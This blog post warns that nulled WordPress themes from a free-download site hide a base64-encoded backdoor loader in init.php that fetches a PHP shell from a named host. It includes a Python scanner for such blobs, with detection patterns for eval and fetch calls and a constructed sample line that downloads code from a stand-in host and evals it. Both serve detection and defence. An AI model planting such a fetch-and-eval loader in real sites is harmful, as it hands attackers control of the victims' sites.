Hi. About two days ago I started to investigate how hackers can benefit from so-called nulled premium WordPress themes. A professional premium theme costs about $49, and here you get it for FREE for no apparent reason. An offer like this should raise questions, and of course someone benefits from it. So let's pick a site that offers this kind of hacked WordPress theme online for free: dlwordpress.com is one of the most famous sites in this category.
HOW DID I DETECT THEM?
Now let's dig into a theme already uploaded to the dlwordpress site. First, after downloading the theme zip file from here,
go into the folder called "framework" and look for the file "init.php". The code looks as shown in the picture below.
As you can see, the install code is encoded using base64. The next step is to decode it to see where the backdoor used by the hackers is, as shown in the picture below.
They use the host apiword.press with the malicious PHP shell code "o.php" to drop a kind of PHP backdoor that hijacks your WordPress site and gives them access to it. The risk is that this type of backdoor is not yet detected by ClamAV, which is used as the virus scanner on web hosting servers, so for now you have to check for it manually.
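The manual check described above can be scripted. The following is an added example, not code from the original post or from the theme: it walks an unpacked theme, decodes every long base64 string literal in its PHP files, and reports the ones that decode to URLs or code-execution and file-fetching calls. The 40-character minimum, the indicator list and the `example.invalid` sample are assumptions made for the example.

```python
import base64
import re
import sys
from pathlib import Path

# Quoted string literals of 40+ base64 characters (minimum length is an assumption).
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{40,}={0,2})["']""")
# Heuristic indicators worth a manual look once a blob is decoded (assumed list).
SUSPICIOUS = re.compile(
    rb"https?://[^\s'\"]+|\b(?:eval|assert|base64_decode|gzinflate|"
    rb"file_get_contents|file_put_contents|curl_exec|fopen)\b", re.I)

def scan_php_source(text):
    """Return (line_no, [indicators]) per base64 literal that decodes to suspicious content."""
    findings = []
    for m in B64_LITERAL.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue  # looked like base64 but is not (bad padding or alphabet)
        hits = sorted({h.decode("latin-1") for h in SUSPICIOUS.findall(decoded)})
        if hits:
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((line_no, hits))
    return findings

def scan_theme(root):
    """Scan every .php file under an unpacked theme directory."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php_source(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report

# Constructed sample, not the theme's real code: a blob hidden in an init.php-style file.
_blob = base64.b64encode(
    b'$c = file_get_contents("http://example.invalid/o.php"); eval($c);').decode()
SAMPLE_INIT_PHP = "<?php\n// theme setup\n$install = '" + _blob + "';\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for file, found in scan_theme(sys.argv[1]).items():
            for line_no, hits in found:
                print(f"{file}:{line_no}: {', '.join(hits)}")
    else:
        print(scan_php_source(SAMPLE_INIT_PHP))
```

Run it with the path of the extracted theme as the only argument; a hit is a reason to read the decoded blob by hand, and a clean result does not rule out other encodings.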
I hope this proof of concept helps you stay safe, since WordPress is the most used blogging platform. My advice is to purchase what you want directly from the owner of the template you want.